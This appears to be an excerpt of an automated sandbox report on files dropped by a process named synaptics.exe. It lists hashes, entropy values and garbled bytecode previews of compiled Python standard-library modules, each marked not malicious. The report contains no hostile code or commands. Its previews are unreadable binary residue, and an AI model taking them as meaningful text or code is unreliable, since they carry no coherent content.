                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s^...d.Z.d.Z.d.d.l.m.Z.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.d...Z.d.d...Z.e.d...Z.e.d.d...=.e.d...Z.e.d...Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e.i.Z.e.e.e.e i.Z!e.e"e.e#i.Z$e%e%e&e&e'e'e(e(e)e*e+e,e-e-e.e.i.Z/e%e0e&e1e'e2e(e3e)e4e+e5e-e6e.e7i.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDeEd.k...r-d.d...ZFeGd.d....zZHeH.Id.....eH.Id.e.......eFeHe.d ....eFeHe.d!....eFeHe.d!....eH.Id"e9......eH.Id#e:......eH.Id$e;......eH.Id%e<......eH.Id&e=......eH.Id'e>......eH.Id(e?......eH.Id)e@......eH.Id*eA......eH.Id+eB......eH.Id,eC......eH.Id-eD......W.d.........n.1...s"w.......Y...eJd.....d.S.d.S.)/z.Internal support module for srei..3......)...MAXREPEAT..MAXGROUPSc........................s&...e.Z.d.Z.d.Z.d.Z.d...f.d.d...Z.....Z.S.)...errorai...Exception raised for invalid regular expressions... Attributes:.. msg: The unformatted error message. pattern: The regular expression pattern. pos: The index in the pattern
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21766
                                                                                                                                                                                                                                  Entropy (8bit):5.596092412819896
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Cin5DWum7nnQBcNr5ZjTL2xs66HeYHmDcgR6OW7tAu9oD3P4At2XmaUI30TAIJzZ:Ciz5K2x6+Ym7R6OW7tX+AAt2X0bJp8Ns
                                                                                                                                                                                                                                  MD5:2A84808B63BF5F21F284201BB2F806DD
                                                                                                                                                                                                                                  SHA1:C37B4A00601CDD2F931F55F1806435FDE81A8F3C
                                                                                                                                                                                                                                  SHA-256:EA843DC1DF9FBF9F56D9A62F878995A3CE20DE9344A10BCFA52DB4D8469D5873
                                                                                                                                                                                                                                  SHA-512:8C9F1F4ACA17B7BD9E6903361956D342F3AA4D759C39039855E1569A7D720A817337A8C16A78B17B9F6A150DEEBF19ECC1AB958F5A2100607D3506CA791B4A21
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.T.d.Z.d.Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.e.e.h...Z.e.e.e.e.e.e.e.h...Z.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.e.e.d...f.d...Z.e.e.f.e.e.f.e.e.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e.e.f.g.f.e.e f.d...Z!e"e#e$e%e&e'e(e)d...Z*e'e#B.e)B.Z+e,e(B.Z-G.d.d...d.e...Z/G.d.d...d...Z0G.d.d...d...Z1G.d.d...d...Z2d.d...Z3d.d ..Z4d!d"..Z5d#d$..Z6d3d&d'..Z7d(d)..Z8d*d+..Z9d4d-d...Z:d/d0..Z;d1d2..Z<d,S.)5z.Internal support module for sre.....)...*z..\[{()*+?^$|z.*+?{Z.0123456789Z.01234567Z.0123456789abcdefABCDEFZ4abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZz. ............................\).z.\a..\bz.\fz.\nz.\rz.\tz.\vz.\\).z.\Ar....z.\Bz.\dz.\Dz.\sz.\Sz.\wz.\Wz.\Z)...i..L..m..s..x..a..t..uc....................@...s....e.Z.d.Z.d.S.)...VerboseN)...__name__..__module__..__qualname__..r....r.....+C:\Users\Public\M20EKMMEH2\lib\sre_parse.pyr....G...s........r....c.............
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):44831
                                                                                                                                                                                                                                  Entropy (8bit):5.570458815080798
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:M653tgqSiJVJd4LRmQPAMN4FM81OVgTkChwR9FP:M63tBFJDy9T9NCUM1CRbP
                                                                                                                                                                                                                                  MD5:B4D4ADFA1D78BF03060E1CFEB1E8CE46
                                                                                                                                                                                                                                  SHA1:CE554B5911719FE9F204EC40F778E1ED8F712B45
                                                                                                                                                                                                                                  SHA-256:6E6FC7F9F2319A03172C8774E04C2FB9ECD187CDC25DB34D0463E6F7E6CEFAA6
                                                                                                                                                                                                                                  SHA-512:3068ADE12E2C038FF211BC127D00F13163B5FEEC2244046E69459193CD4CDD536160BFF16783E7E64E5AF85ED8455BAA0EA90922A0479260A8053CDE34DA442B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m Z m!Z!..z.d.d.l.m"Z"..W.n...e#yi......Y.n.w.d.d.l.m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-..d.d.l.m.Z.m/Z/..e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e.j0d.e1d.d...e.d.....e2j3..Z4e2_4d.d...e2j5.6..D...Z7e8e2d.d...Z9G.d.d...d.e...Z:G.d d!..d!e...Z;G.d"d#..d#e...Z<G.d$d%..d%e...Z=e.j>d&k...r.d.d'l.m?Z?m@Z@..d.d(lAmAZAmBZBmCZC..d.d)lAmDZDmEZEmFZF..d.d.lAZGd.d.lHZHd.d.lIZId.d.lJZJeKZLd*g.ZMeNe.d+..ZOe.ZPe.ZQd,d-..ZRd.d/..ZSd0d1..ZTd2d3..ZUe.d4d5..ZVd6d7..ZWG.d8d9..d9e.d9d:....ZXG.d;d<..d<eXe...ZYG.d=d>..d>e...ZZeYj[f.d.d.d.d?..d@dA..Z\d[e]dBeYj[d.d.d.d.d.dC..dDdE..Z^e\Z_e^Z`G.dFdG..dG..ZadHdI..ZbG.dJdK..dKeA..ZceceZ_deaeZ_ed.d.dBe]e3d.dLdLd.f.dMdN..ZfdOdP..ZgdQZhdRZidSdT..ZjdUdV..Zkeld.eFf.dWdX..ZmdYdZ..Znd.S.)\
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4284
                                                                                                                                                                                                                                  Entropy (8bit):5.541156423250741
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Vn/f+60wN3EXHm/aowjk0wBoCAEFXOrW6QBeABPl:VeRy3EmBwjk0w+CFXefQBT
                                                                                                                                                                                                                                  MD5:8177C06C7A1B52687834FDAFA67F4A54
                                                                                                                                                                                                                                  SHA1:B06B642DAC3F45448B603549BC7C6B7FA2CE4895
                                                                                                                                                                                                                                  SHA-256:944E308E1CB4D124EB42051081C68621E6AF24CBDD4CA74A66F096C91A205B99
                                                                                                                                                                                                                                  SHA-512:912D55D30FC6B3C78144D9DF3DA8399723F9E2C6C9D13C276AB585E50AF76F6B2276340DA3AA6DC58DFD5943C29E9443063900FAEF92B2EF08258E99FD231E56
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d0........................@...sJ...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z d*Z!d+Z"e"Z#d,Z$d-Z%d.Z&d/Z'd0Z(d-Z)d.Z*d/Z+d1Z,d2Z-d3Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6d.Z7d3Z8d2Z9d.Z:d4Z;d5Z<d6Z=d7Z>d8Z?e.d9f.e.d:f.e.d;f.e.d<f.e.d=f.e.d>f.e.d?f.f.e)d@f.f.e*dAf.f.e+e!B.d:f.e!dBf.e+dCf.f.e-d@f.f.e.dAf.f.e/e"B.d:f.e"dBf.e/dCf.f.e1d@f.f.e2dAf.f.e3e$B.dDf.e$dEf.e3dCf.f.f.Z@dFdG..ZAd2ZBd*ZCd/ZDd3ZEd.ZFd.ZGd.ZHd.ZId.ZJd5ZKd.ZLd.ZMd+ZNd,ZOd.ZPd-ZQd4ZRz.d.dHlST.W.dIS...eT..y$......Y.dIS.w.)JzoConstants/functions for interpreting results of os.stat() and os.lstat()...Suggested usage: from stat import *...................................................c....................C........|.d.@.S.).zMReturn the portion of the file's mode that can be set by. os.chmod().. i..........moder....r.....&C:\Users\Public\M20EKMMEH2\lib\stat.py..S_IMODE..........
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7113
                                                                                                                                                                                                                                  Entropy (8bit):5.393111734773908
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:HLetNTT8nclJcsGpTeWD3EDNmO2vja68/2s4li6lu:SbTT8nmvGpT/O2vja68/x4limu
                                                                                                                                                                                                                                  MD5:22C9D90E0DC4528B01B2BF716F2CB19F
                                                                                                                                                                                                                                  SHA1:730A6D9AA18CE7A5C151B289FD966CC417DC11BD
                                                                                                                                                                                                                                  SHA-256:2EEBF9ED225656F9EF63E64E8622370CF99B2D890A84C24D028A7B514385D3D4
                                                                                                                                                                                                                                  SHA-512:463C319C0518DFFEDCC75303431134C2625281F8A01D97E0F1542AB85228F5089AB530320AC9C99E80F09A1EFB53E1824A9F86C6D81A186D816FB2A6F0FDEC4A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d^*.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.e.e...Z.d.Z.e.d...d...Z.d.Z.d.Z.e.e...e...e...Z.d.d.d...Z.d.d.l.Z.d.d.l.m.Z...i.Z.G.d.d...d...Z.e.......G.d.d...d...Z.d.S.).an...A collection of string constants...Public module variables:..whitespace -- a string containing all ASCII whitespace.ascii_lowercase -- a string containing all ASCII lowercase letters.ascii_uppercase -- a string containing all ASCII uppercase letters.ascii_letters -- a string containing all ASCII letters.digits -- a string containing all ASCII decimal digits.hexdigits -- a string containing all ASCII hexadecimal digits.octdigits -- a string containing all ASCII octal digits.punctuation -- a string containing all ASCII punctuation characters.printable -- a string containing all ASCII characters considered printable..)...ascii_letters..ascii_lowercase..ascii_uppercase..capwords..digits..hexdigits..octdigits..printable..punctuation..whitespace..Formatter..Template.....Nz. .....Z.abcdefg
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17086
                                                                                                                                                                                                                                  Entropy (8bit):5.693315122196875
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:rORubSi/2orlLSqOf9dzA3gfqtv+ScNDMepN9WDnuxb3rOyb5:rOkbSi+orF29JlqtvtcNoepN9Wzra
                                                                                                                                                                                                                                  MD5:C9381FAC7DF1CC8218E38947E8270B94
                                                                                                                                                                                                                                  SHA1:64BFA8BC73593F2E07C456F19615EB8FE67E9424
                                                                                                                                                                                                                                  SHA-256:B8807DBE0825A360B109F86D3DF13F7118EA904C5E91F195ABCACA205C1FF92D
                                                                                                                                                                                                                                  SHA-512:29F29ED1BD35B978731812A8F2F1C3946C6BD11A8779C2AF127F6C98324FE90C5CBEBF222A25DAABEF93734FFE9674004A85A2F93A269DABA56295F0A1C9B151
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.3.......................@...s....d.Z.d.d.l.m.Z...e.j.d.k.s.J...d.d...Z.e.g.d...e.e.d.d.........Z.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d&..d'd(..d)d*..d+d,..i.d-d...d/d0..d1d2..d3d ..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE..dFdG..dHdI..dJdK..dLdM....i.dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\dM..d]dO..d^dQ..d_dS..d`dU..dadW..dbdY..dcd[..ddde..dfdg....i.dhdi..djdk..dldm..dndo..dpdq..drds..dtde..dudg..dvdi..dwdk..dxdm..dydo..dzdq..d{ds..d|d}..d~d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d}..d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17086
                                                                                                                                                                                                                                  Entropy (8bit):5.693315122196875
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:rORubSi/2orlLSqOf9dzA3gfqtv+ScNDMepN9WDnuxb3rOyb5:rOkbSi+orF29JlqtvtcNoepN9Wzra
                                                                                                                                                                                                                                  MD5:C9381FAC7DF1CC8218E38947E8270B94
                                                                                                                                                                                                                                  SHA1:64BFA8BC73593F2E07C456F19615EB8FE67E9424
                                                                                                                                                                                                                                  SHA-256:B8807DBE0825A360B109F86D3DF13F7118EA904C5E91F195ABCACA205C1FF92D
                                                                                                                                                                                                                                  SHA-512:29F29ED1BD35B978731812A8F2F1C3946C6BD11A8779C2AF127F6C98324FE90C5CBEBF222A25DAABEF93734FFE9674004A85A2F93A269DABA56295F0A1C9B151
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.3.......................@...s....d.Z.d.d.l.m.Z...e.j.d.k.s.J...d.d...Z.e.g.d...e.e.d.d.........Z.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d&..d'd(..d)d*..d+d,..i.d-d...d/d0..d1d2..d3d ..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE..dFdG..dHdI..dJdK..dLdM....i.dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\dM..d]dO..d^dQ..d_dS..d`dU..dadW..dbdY..dcd[..ddde..dfdg....i.dhdi..djdk..dldm..dndo..dpdq..drds..dtde..dudg..dvdi..dwdk..dxdm..dydo..dzdq..d{ds..d|d}..d~d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d}..d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):318
                                                                                                                                                                                                                                  Entropy (8bit):5.118440227874491
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:y/XextfvXhzYXcCuYKvg6FraMaVkoopngmIEmuaHK2/Zkn:Cuxt35YXcaKvjFrDaVkoeXz2/Zkn
                                                                                                                                                                                                                                  MD5:5642FA92C34BC32FAEB2D46DCDB6687F
                                                                                                                                                                                                                                  SHA1:2F5B3365108F0C607AB1A6B4E8DC8DF35539E739
                                                                                                                                                                                                                                  SHA-256:C161997C31F04C4C524EA79DDFEDEFB8C59A45D7E5AFC20F76F4850E78A5CCB1
                                                                                                                                                                                                                                  SHA-512:20F80C906A7B21B90E8E1F855FEE8B033816C979071E570981FF5FE43E4A822D3ADD598EDD303DB639C9CFFA7790669A711ED3774248C8BF70498B0E3523090A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s,...g.d...Z.d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.S.).).Z.calcsize..packZ.pack_into..unpackZ.unpack_fromZ.iter_unpack..Struct..error.....)...*)..._clearcache)...__doc__N)...__all__Z._structr....r......r....r.....(C:\Users\Public\M20EKMMEH2\lib\struct.py..<module>....s............
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24075
                                                                                                                                                                                                                                  Entropy (8bit):5.283906014901038
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:8GeOsQ/N1bmiY+HWkXkONXPVlMyNwfUC9Nrz/Stjtb7hLBx3/Tds5Vp:LeR81bminY0XPVmyNwM8NPqJ7Zb7ds5T
                                                                                                                                                                                                                                  MD5:8978FEA7CF31AD101ADE1974D3D4392A
                                                                                                                                                                                                                                  SHA1:51155FE2E93BF05FCA4778C2158266EFFA7E0C88
                                                                                                                                                                                                                                  SHA-256:CBBA632D53EA7D1D5BFDC2609457ABE65CC9D02910B7101C856C841A1515AC3A
                                                                                                                                                                                                                                  SHA-512:DF1B2FB6237AACBFBF54E73277DDCE6DAA4AE7A297DFDABB88A504488928C894510EE8D2EED3547761864AA98CFB0BBF4F60D9F41D28D3BE6621414639E0DDFB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dku.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.Z.e.j.e.j.B.e.j.B.Z.e.e.d...rJe.e.j.O.Z.e.Z e.e.d...rVe e.j!O.Z e.e.d...r_e.j"Z"n.d.Z"d.Z#e...Z$d.d...Z%d.d...Z&d.d...Z'G.d.d...d...Z(d.d...Z)d.d...Z*d.a+d.d...Z,d.d...Z-d.d...Z.d.d...Z/d.a0d.d...Z1d d!..Z2d"d#..Z3d?d%d&..Z4d@d'd(..Z5d)e#d.f.d*d+..Z6G.d,d-..d-..Z7G.d.d/..d/..Z8.....2dAd.d3..d4d5..Z9e.j:d6k.s.e.j;d7k.r.e9Z<n.e.e.d8..a=......dBd.d3..d9d:..Z<G.d;d<..d<..Z>G.d=d>..d>..Z?d.S.)Ca....Temporary files...This module provides generic, low- and high-level interfaces for.creating temporary files and directories. All of the interfaces.provided by this module can be used without fear of race conditions.except for 'mktemp'. 'mktemp' is subject to race conditions and.should not be used; it is provided for backward compatibility only...The default path names are returned as str. If you supply bytes as.input, all return values will b
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24075
                                                                                                                                                                                                                                  Entropy (8bit):5.283906014901038
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:8GeOsQ/N1bmiY+HWkXkONXPVlMyNwfUC9Nrz/Stjtb7hLBx3/Tds5Vp:LeR81bminY0XPVmyNwM8NPqJ7Zb7ds5T
                                                                                                                                                                                                                                  MD5:8978FEA7CF31AD101ADE1974D3D4392A
                                                                                                                                                                                                                                  SHA1:51155FE2E93BF05FCA4778C2158266EFFA7E0C88
                                                                                                                                                                                                                                  SHA-256:CBBA632D53EA7D1D5BFDC2609457ABE65CC9D02910B7101C856C841A1515AC3A
                                                                                                                                                                                                                                  SHA-512:DF1B2FB6237AACBFBF54E73277DDCE6DAA4AE7A297DFDABB88A504488928C894510EE8D2EED3547761864AA98CFB0BBF4F60D9F41D28D3BE6621414639E0DDFB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dku.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.Z.e.j.e.j.B.e.j.B.Z.e.e.d...rJe.e.j.O.Z.e.Z e.e.d...rVe e.j!O.Z e.e.d...r_e.j"Z"n.d.Z"d.Z#e...Z$d.d...Z%d.d...Z&d.d...Z'G.d.d...d...Z(d.d...Z)d.d...Z*d.a+d.d...Z,d.d...Z-d.d...Z.d.d...Z/d.a0d.d...Z1d d!..Z2d"d#..Z3d?d%d&..Z4d@d'd(..Z5d)e#d.f.d*d+..Z6G.d,d-..d-..Z7G.d.d/..d/..Z8.....2dAd.d3..d4d5..Z9e.j:d6k.s.e.j;d7k.r.e9Z<n.e.e.d8..a=......dBd.d3..d9d:..Z<G.d;d<..d<..Z>G.d=d>..d>..Z?d.S.)Ca....Temporary files...This module provides generic, low- and high-level interfaces for.creating temporary files and directories. All of the interfaces.provided by this module can be used without fear of race conditions.except for 'mktemp'. 'mktemp' is subject to race conditions and.should not be used; it is provided for backward compatibility only...The default path names are returned as str. If you supply bytes as.input, all return values will b
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13823
                                                                                                                                                                                                                                  Entropy (8bit):5.342399706913279
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:CB47ddTOzzlFEYKRuPSzqjNGmwImkWf8FBQ:CB47dwF/5JNG5MkkBQ
                                                                                                                                                                                                                                  MD5:5AD73B0658806DD412B768464FD812D8
                                                                                                                                                                                                                                  SHA1:51E78432AF8A6B7A1007E764991DCEED12C533E5
                                                                                                                                                                                                                                  SHA-256:D35364467DF50F39462D6571FE7BF9762D4A88065E7EB975F70460EDBA113E81
                                                                                                                                                                                                                                  SHA-512:29961581719056D6EF3DB686EAA98546963F687333D67039239FED00F1CA835949EEE02BB2B61332EA61BF14867AB6C6875D81452E5782D95204BADB68F252A6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d*O.......................@...s....d.Z.d.d.l.Z.g.d...Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.e...d.e.j...Z.e...d.e.j...Z.d.d...Z.d.d.d...Z.e.d.k.rDe.e.d.......d.S.d.S.).z.Text wrapping and filling.......N)...TextWrapper..wrap..fill..dedent..indent..shortenz...... c....................@...s....e.Z.d.Z.d.Z.i.Z.e.d...Z.e.D.].Z.e.e.e.e...<.q.d.Z.d.Z.d.e...e.....Z.d.e.d.d.......Z.e...d.e.e.e.e.d.....e.j...Z.[.[.[.e...d.e.....Z.[.e...d...Z.....................d&d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d.S.)'r....a..... Object for wrapping/filling text. The public interface consists of. the wrap() and fill() methods; the other methods are just there for. subclasses to override in order to tweak the default behaviour.. If you want to completely replace the main wrapping algorithm,. you'll probably have to override _wrap_chunks()... Several instance attributes control various aspects of wrapping:. width (default:
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):44980
                                                                                                                                                                                                                                  Entropy (8bit):5.173211281018087
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:d1h/MIxOwAgbSGxwbNNo+rkPsXj16a1Zmi8Y2S41QrTrWOnO89x+6Lc/QpZ2efn0:dX/8Zf2lbPs/v612aOJ/46PeaBATiI/z
                                                                                                                                                                                                                                  MD5:27DC22E264B43B6AF355F26AF3191C8E
                                                                                                                                                                                                                                  SHA1:697FC19D4B22C91D9CA9D0D814E7CCFAAA390D49
                                                                                                                                                                                                                                  SHA-256:9BABBF9F352E1693990B475C2F5218643AB84E8A00C73B9D29963E5138DBFAF5
                                                                                                                                                                                                                                  SHA-512:3007D681AE11D0800DBF266347425925FCCC3AE7265E5E206CBBD795A4B85213D0712B57F70B42D95E9AF3AB7C9BCBCF164D138574A32FD1026F1C6EE2CE0969
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s6...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...z.d.d.l.m.Z...W.n...e.y=......d.d.l.m.Z...Y.n.w.g.d...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.z.e.j.Z.d.Z.e...d.....W.n...e ye......d.Z.Y.n.w.e.j!Z"z.e.j#Z$W.n...e yy......d.Z$Y.n.w.e.j%Z%[.d.a&d.a'd.d...Z(d.d...Z)d.d...Z*d.d...Z+e.Z,d.d...Z#G.d.d...d...Z-e-Z.G.d.d...d...Z/G.d.d...d...Z0G.d.d...d.e0..Z1G.d.d...d...Z2G.d.d ..d ..Z3G.d!d"..d"e4..Z5e.d#..j6Z7d$d%..Z8e#..a9i.Z:i.Z;e...Z<e...a=e>..a?d&d'..Z@G.d(d)..d)..ZAz.d.d*l.mBaCmDZE..W.n#..e...y.......d.d+lFmGZH..d.d,l.mIZI..eId-d...ZDd/d-..ZEd0d1..aCY.n.w.tCZJd2d3..ZKG.d4d5..d5eA..ZLG.d6d7..d7eA..ZMG.d8d9..d9eA..ZNd:d;..ZOd<d=..ZPd>d?..ZQd@dA..ZRdBdC..ZSdDdE..ZTg.ZUd.aVdFdG..ZWd.dHl.mXZX..eM..aYdIdJ..ZZdKdL..Z[z.d.dMl.m\Z]..W.n...e...y.......d.dNl^m]Z]..Y.n.w.dOdP..Z_e`e.dQ....r.e.jae_dR....d.S.d.S.)Sz;Thread module emulating a subset of Java's threading model......N)...monotonic)...WeakSet)...islice..count)...deque)...get_ident
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2749
                                                                                                                                                                                                                                  Entropy (8bit):5.773002082742788
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:6HWS58lFEOqIlPBJR41XQBzH3ch9C7Q7WnvKQvVgkGQLU:6HWSOFEOb5nJBb3ch9T6qKLU
                                                                                                                                                                                                                                  MD5:9CD2E0E5622F7303F6E687DC03A3F056
                                                                                                                                                                                                                                  SHA1:215474D2F57895D8A26D1F628BA402917001BFE7
                                                                                                                                                                                                                                  SHA-256:E4E18A9921CB13FEC851DB39B42D687BA15D1FFA713B31094306057B2388A38A
                                                                                                                                                                                                                                  SHA-512:41054D5867335820B4E9A48B61DFBB609B2BCDD1015DEA6FF93368D47B840C8EE7D76673A4B658C6122C708E779DDD1465B3D0340B7E1F603725E871B183F736
                                                                                                                                                                                                                                  Malicious:false
